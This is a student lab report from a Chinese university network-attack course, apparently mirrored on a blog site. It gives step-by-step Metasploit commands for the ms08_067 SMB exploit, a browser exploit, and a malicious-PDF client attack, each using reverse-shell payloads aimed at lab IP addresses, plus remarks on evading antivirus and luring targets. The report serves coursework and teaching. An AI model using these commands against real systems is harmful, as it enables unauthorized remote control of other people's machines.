zoukankan      html  css  js  c++  java
  • 2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

    2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

    实验内容

    一个主动攻击实践,如ms08_067

    1. 启用msf终端msfconsole

    2. 然后使用search命令搜索该漏洞对应的模块:search ms08_067

    3. 渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分:模块类型、目标平台、目标服务和模块名字。

    use exploit/windows/smb/ms08_067_netapi
    4. 查看信息:
    show payloads

    1. 选择攻击载荷:
      set payload generic/shell_reverse_tcp

    2. 查看配置渗透攻击所需的配置项:
      show options

    3. 查看渗透攻击模块所能成功渗透攻击的目标平台
      show targets

    4. 设置攻击Ip(默认端口445)
      set RHOST 192.168.241.138

    5. 成功后回连主机端口5231
      set LPORT 5231
      set LHOST 192.168.241.134

    6. 目标系统类型在这里为5(该系统没有数据执行保护功能(DEF)
      set target 5

    7. 查看设置后的选项设置的值是否正确:
      show options

    8. 发起渗透攻击
      exploit

    1. 查看结果
      ipconfig /all

    一个针对浏览器的攻击,如ms11_050

    这里在网上找了一个IE浏览器的漏洞:ms14_064(我们不一样)

    1. 首先输入search ms14_064查找漏洞

    2. 对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_

    3. 输入show payloads,查看载荷进行选择,这里用实验载荷set payload generic/shell_reverse_tcp

    4. show options查询需要配置

    5. 输入set SRVHOST 192.168.241.134
      set LHOST 192.168.241.134
      set LPORT 5231

    6. 输入exploit生成URL

    7. 在windows端访问该URL

    8. 在kuil端输入sessions,可看到一个ID为1的连接

    9. 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。

    一个针对客户端的攻击,如Adobe

    1. 首先还是先利用search adobe进行搜索

    2. 然后选择use windows/fileformat/adobe_flashplayer_button

    3.然后set payload windows/meterpreter/reverse_tcp,利用show options查看所要配置的信息

    1. 需要对LHOSTLPORTFILENAME进行配置

    2. 输入exploit,生成pdf文件

    3. 输入use exploit/multi/handler,设置监听端口,主机号

    4. exploit开始监听

    5. 在windows端,打开20155231.pdf,成功回连

    (我们不一样。。。试过很多个模板,然而只成功过一次,还没有截图。大部分都这样,回连没成功,端口没有打开)

    成功应用任何一个辅助模块

    1. 利用show auxiliary,查看辅助模块(我们不一样)

    2. 选择scanner/http/title,扫描网页标签

    3. 查看配置,配置LHOST192.168.241.134

    4. 输入exploit进行监听

    显示如图。但不知道标签记录在哪里,这漏洞有啥用?

    试验后回答问题

    1. 用自己的话解释什么是exploit,payload,encode.
    • exploit是执行漏洞。
    • payload是有效载荷,执行代码的一个载体模板
    • encode是编码,对我们的程序或代码进行伪装

    实践总结与体会

    由于自己电脑配置有点渣。。两个虚拟机一起开略卡,用了同学的电脑做实验。成功的人都是一个样,没成功的人各有个的不同。查看过其他同学在实验中遇到的问题和解决方法。有的解决了,有的依然没又解决。。。

    离实战还缺些什么技术或步骤?

    很多用漏洞产生的文件都会遭到管家的查杀,实战中实现回连是个问题,诱导靶机执行操作也是问题

  • 相关阅读:
    计算中文混合字符串长度(一)
    PHP截取含中文的混合字符串长度的函数
    获取星座的JS函数
    获取生日对应星座的PHP函数
    简单的 jQuery 浮动层随窗口滚动滑动插件实例
    MD5算法实现
    70. Climbing Stairs QuestionEditorial Solution
    167. Two Sum II
    167. Two Sum II
    303. Range Sum Query
  • 原文地址:https://www.cnblogs.com/javasyn/p/8982445.html
Copyright © 2011-2022 走看看